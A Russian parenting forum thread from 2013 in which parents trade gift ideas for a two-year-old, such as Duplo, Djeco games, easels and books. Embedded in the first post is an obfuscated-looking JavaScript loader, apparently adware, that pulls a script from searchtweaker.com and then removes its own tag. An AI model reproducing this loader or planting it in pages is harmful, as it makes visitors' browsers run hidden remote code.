2-ое день рождение.

Моей дочке тоже будет скоро 2 годика, я уже поназаказывала родственникам и гостям подарки - качалку-лошадку, блоки Дьенеша, кукольный домик, фигурки диких животных, набор ферма (продается в ИКЕА) и другие. Может и вам, что приглянется из нашего списка.А вообще дочка оооооочень любит  пластилин (или тесто) и краски.[removed](function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();[removed]
30.09.2013
Можно посудку (есть красивая в Имаджинариуме, например). Мне кажется, абсолютно все дети обрадуются пвх-продуктам от Огонька (наборы овощей, фруктов, хлеба, выпечки). И вооюще у Огонька неплохие наборы. Можно животных подобрать. Из настольных игр мне нравятся Джеко и Вальда. Еще я горячий фанат Сказок дерева и Лукоморья - они делают деревянные игрушки (животные, сказочные персонажи).Если рисуют и лепят дома, можно краски пальчиковые подарить и пластилин.И книги! Моя дочка предпочла бы книги всем игрушкам, наверное))) 
28.09.2013
НаборФрукты разрезные Мозаика, 120 фишекмозаикаРамка-вкладыш рыбалка (очень нравится сыну)Дом с замкамидомик  обалденный с замочками и звонкамиА на 2 года я своему такую машинку дарила, играет с удовольствием:
28.09.2013
Любое лего дупло
28.09.2013
У меня младшей дочке 2 года и она с удовольствием играет вот в такое лото http://www.babyblog.ru/community/post/igraem/1726417. Ещё писала в дневнике http://www.babyblog.ru/user/inv1981/3065687А на этот ДР у нас припасена игра Scotchi Супермаркет - у них много игр с липучками для деток 2-3 лет http://images.yandex.ru/yandsearch?text=игры Scotchi&uinfo=sw-1583-sh-731-fw-1358-fh-525-pd-1.Ещё вот такую музыкальную книжкуСказки для малышей.И ещё планшет обучающий - Логико-малыш.Планшеты Логико-малыш и комплекты карточекОтзывы и видео можно посмотреть здесь.Отличный отзыв с фотографиями http://www.babyblog.ru/user/olgamarus/3028430.На этом сайте полное описание http://fly-mama.ru/posobie-logiko-malysh/Ещё из развивашек бусы для шнуровки - Наши игрушки из дерева - часть 1
28.09.2013
Если нет мольберта - то конечно мольберт - отличная штука. И у нас, и у всех друзей мольберт из Икеи -мне кажется самый оптимальный вариант. Правда он не магнитный, но у нас магнитная доска отдельно висит большая.
28.09.2013
У меня девочка 2,3. Мы бы больше всего обрадовались: книге (книгам) их сейчас столько интересныхчему нибудь из Djeco. Нравится все, но дороговато себе покупатьЛего Дупло пользуется популярностью у нас. вот такой конструктор в фаворитах: http://www.inteltoys.ru/catalog/414/prod5059.htmlеще хочу купить кухню и все что с ней (посуда продукты)и мольберткуклы коляски кроватки мягкие игрушки популярностью у нас не пользуются.
28.09.2013
Нужен совет и помощь! "Большая стирка"